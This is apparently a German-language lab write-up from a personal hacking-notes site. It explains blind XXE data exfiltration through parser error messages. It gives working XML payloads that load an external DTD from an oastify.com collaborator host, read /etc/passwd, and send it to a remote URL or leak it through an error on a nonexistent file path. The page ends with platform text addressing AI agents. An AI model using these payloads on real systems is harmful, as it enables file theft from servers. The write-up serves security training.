> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/xxe/blind-xxe-data-exfiltration-via-error-messages.md).

# Blindes XXE-Datenfiltern über Fehlermeldungen

### Ausnutzung von blindem XXE zum Abrufen von Daten über Fehlermeldungen

Labor: Die Funktion „Bestand prüfen“ analysiert ein XML, ohne die Antwort direkt anzuzeigen. Das Ziel ist, eine externe Entität (DTD, die auf einem Server gehostet wird) zu verwenden, um einen Fehler zu verursachen, der den Inhalt des `/etc/passwd` Datei in der Ausnahmemeldung anzeigt. Die Technik, den Parser zu zwingen, Dateiinhalt in einen nicht vorhandenen URI einzubinden, wird verwendet, sodass die Ausnahme diesen Inhalt offenbart.

* Der Eingabepunkt parst XML, gibt das Ergebnis jedoch nicht normal zurück.
* Der Server erlaubt die Einbindung einer externen DTD (auf der Exploit-Domain gehostet).
* Die Fehlermeldung des Parsers enthält ausreichend Informationen, sodass, wenn die DTD eine fehlerhaft geformte Referenz verursacht, die den Inhalt einer Datei enthält, dieser Inhalt in der Ausnahme erscheint.

#### Laden Sie eine auf dem Server gehostete externe DTD, um zu arbeiten, indem Sie eine `DOCTYPE` Anweisung, die auf die URL des Exploit-Servers verweist:

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % myFile SYSTEM "https://qf9v476vsapx2mqf01es1v7cu30xoncc.oastify.com"> %myFile;]>
<stockCheck>
<productId>
2
</productId>
<storeId>
1
</storeId>
</stockCheck>
```

{% endcode %}

<figure><img src="/files/c44da3b839d91bdff10cdcf3bcc30d8014f08d06" alt=""><figcaption></figcaption></figure>

Der Parser gibt einen Fehler vom Typ zurück:/ `XML-Parser mit Fehler beendet: org.XML.sax.SAXParseException; systemId: https://qf9v476...; lineNumber: 1; columnNumber: 2; Die Markup-Deklarationen... müssen wohlgeformt sein.`

2. Direkter Versuch, aufzulisten `/etc/passwd` (Problem: zu viele Zeilen):

```xml
<!ENTITY % file SYSTEM "file:////etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://rrmwg8iw4b1yen2gc2qtdwjd64c00qof.oastify.com/?content=%file;'>">
%eval;
%exfil;
```

<figure><img src="/files/2eb93c8ba10a271f6341d86cdbeb6eafc09b1184" alt=""><figcaption></figcaption></figure>

3. Technik, die mit Fehlerkontext verwendet wird — den Inhalt der Datei in eine unmögliche Referenz einfügen, um den Parser zu zwingen, diesen in der Ausnahme anzuzeigen:

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

Durch Auslösen der Referenz auf `file:///nonexistent/%file;`, erzeugt der Parser eine Ausnahme, die den Text der eingebundenen Ressource enthält (`/etc/passwd`), was es ermöglicht, den Inhalt trotz des Fehlens einer normalen Rückgabe zur Funktionalität zu exfiltrieren.

<figure><img src="/files/53a86e7311e5777bb46a69094ed50c86e0f0b72e" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/xxe/blind-xxe-data-exfiltration-via-error-messages.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
